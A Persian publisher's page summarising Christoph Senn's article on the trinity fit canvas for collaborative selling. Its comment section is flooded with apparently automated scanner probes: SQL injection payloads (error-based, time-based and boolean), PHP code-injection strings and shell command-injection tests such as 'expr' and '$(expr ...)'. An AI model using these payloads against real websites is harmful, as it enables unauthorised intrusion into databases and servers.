گروه محصولات

عنوان مقاله: فروش را متوقف، همکاری را شروع کنید

گزیده مدیریت 230

By Christoph Senn

نوشته: کریستف سن

ترجمه: دکتر محمدرضا ادیب‌ پور

بوم تناسب سه‌گانه یکی از چارچوب‌های فروش محسوب می‌شود که برای تسهیل ارزش‌آفرینی همکارانه بین فروشندگان و خریداران طراحی شده است. بوم تناسب سه‌گانه که با الهام از بوم راهبرد اقیانوس آبی (تدوین‏شده توسط چان کیم و رنه مابورن) و بوم مدل کسب‌وکار (تدوین‏شده توسط الکساندر اوستروالدر و ایو پیگنور) طراحی شد، چارچوبی تشخیصی و عملی است. این چارچوب، دیدگاهی محدود و محصول‏محور را به دیدگاهی گسترده‌تر و مشتری‏مدار تغییر می‌دهد. همچنین، بوم تناسب سه‌گانه تمرکز را از فروش محصولات و خدمات موجود به سمت کمک و همکاری در ایجاد محصولات و خدمات جدید سوق می‌دهد. نویسنده، در این مقاله، مولفه‌های کلیدی بوم تناسب سه‌گانه را به‌تفصیل شرح می‌دهد و توضیح می‌دهد چگونه شرکت‌هایی مانند بی‌.ام.‌و، کونیکا‏مینولتا و گپ از بوم تناسب سه‌گانه سود جسته‌اند.

انصراف از نظر
نظرات
20/05/1402 07:13 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

${@var_dump(md5(584005512))};

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

'-var_dump(md5(781281741))-'

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
${@var_dump(md5(563820716))};

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456'and/**/extractvalue(1,concat(char(126),md5(1244032056)))and'

123456

20/05/1402 07:18 ق.ظ
'-var_dump(md5(821371548))-'

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:18 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456
expr 895392991 + 838766805

20/05/1402 07:19 ق.ظ
123456

${960048910+808983914}

20/05/1402 07:19 ق.ظ
extractvalue(1,concat(char(126),md5(1247187969)))

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456|expr 938118265 + 927227104

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456'and(select'1'from/**/cast(md5(1829353026)as/**/int))>'0

123456

20/05/1402 07:19 ق.ظ
123456

123456$(expr 922679826 + 846400911)

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456/**/and+3=3

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456/**/and/**/cast(md5('1355930398')as/**/int)>0

123456

20/05/1402 07:19 ق.ظ
123456

123456&set /A 983819759+936322480

20/05/1402 07:19 ق.ظ
123456

(select*from(select+sleep(0)union/**/select+1)a)

20/05/1402 07:19 ق.ظ
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1337638153')))

123456

20/05/1402 07:19 ق.ظ
123456

expr 979409016 + 823815982

20/05/1402 07:19 ق.ظ
123456

(select*from(select+sleep(9)union/**/select+1)a)

20/05/1402 07:19 ق.ظ
123456 expr 890050737 + 903676695

123456

20/05/1402 07:19 ق.ظ
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1354900818')))>'0

123456

20/05/1402 07:20 ق.ظ
123456"and/**/extractvalue(1,concat(char(126),md5(1239854748)))and"

123456

20/05/1402 07:20 ق.ظ
123456

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

20/05/1402 07:20 ق.ظ
123456|expr 925477045 + 927851364

123456

20/05/1402 07:20 ق.ظ
123456鎈'"\(

123456

20/05/1402 07:20 ق.ظ
123456

123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='

20/05/1402 07:20 ق.ظ
123456$(expr 867349160 + 844702270)

123456

20/05/1402 07:20 ق.ظ
123456'"\(

123456

20/05/1402 07:20 ق.ظ
123456

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

20/05/1402 07:20 ق.ظ
123456&set /A 981524943+983771509

123456

20/05/1402 07:20 ق.ظ
123456

123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="

20/05/1402 07:20 ق.ظ
expr 897866382 + 903370824

123456

20/05/1402 07:20 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

20/05/1402 07:20 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/

20/05/1402 07:20 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

20/05/1402 07:20 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0

20/05/1402 07:21 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

20/05/1402 07:21 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/

20/05/1402 07:21 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:0

20/05/1402 07:21 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:9

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',0)

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('u',9)

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',0)='w

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',9)='u

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456/**/and+0=0

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456/**/and+1=8

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456'and'm'='m

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456'and'p'='w

123456

20/05/1402 07:22 ق.ظ
123456

123456'and/**/extractvalue(1,concat(char(126),md5(1762816260)))and'

20/05/1402 07:22 ق.ظ
123456"and"s"="s

123456

20/05/1402 07:22 ق.ظ
123456

123456"and/**/extractvalue(1,concat(char(126),md5(1702055503)))and"

20/05/1402 07:22 ق.ظ
123456"and"i"="a

123456

20/05/1402 07:22 ق.ظ
123456

extractvalue(1,concat(char(126),md5(1500618196)))

20/05/1402 07:22 ق.ظ
(select*from(select+sleep(0)union/**/select+1)a)

123456

20/05/1402 07:22 ق.ظ
123456

123456'and(select'1'from/**/cast(md5(1867852361)as/**/int))>'0

20/05/1402 07:22 ق.ظ
(select*from(select+sleep(9)union/**/select+1)a)

123456

20/05/1402 07:23 ق.ظ
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

20/05/1402 07:23 ق.ظ
123456

123456/**/and/**/cast(md5('1004208823')as/**/int)>0

20/05/1402 07:23 ق.ظ
123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1794010236')))

20/05/1402 07:23 ق.ظ
123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='

123456

20/05/1402 07:23 ق.ظ
123456

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1449143104')))>'0

20/05/1402 07:23 ق.ظ
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

20/05/1402 07:23 ق.ظ
123456

123456鎈'"\(

20/05/1402 07:23 ق.ظ
123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="

123456

20/05/1402 07:23 ق.ظ
123456

123456'"\(

20/05/1402 07:23 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

123456

20/05/1402 07:23 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/

123456

20/05/1402 07:23 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

20/05/1402 07:24 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0

123456

20/05/1402 07:24 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

123456

20/05/1402 07:24 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/

123456

20/05/1402 07:24 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:0

123456

20/05/1402 07:24 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:9

123456

20/05/1402 07:24 ق.ظ
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('n',0)

123456

20/05/1402 07:24 ق.ظ
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('h',9)

123456

20/05/1402 07:25 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v

123456

20/05/1402 07:25 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('k',9)='k

123456

20/05/1402 07:26 ق.ظ
123456

123456

20/05/1402 07:26 ق.ظ
123456

123456

20/05/1402 07:26 ق.ظ
123456

123456

20/05/1402 07:26 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:27 ق.ظ
123456

123456

20/05/1402 07:28 ق.ظ
123456

123456

20/05/1402 07:28 ق.ظ
123456

123456

20/05/1402 07:28 ق.ظ
123456

123456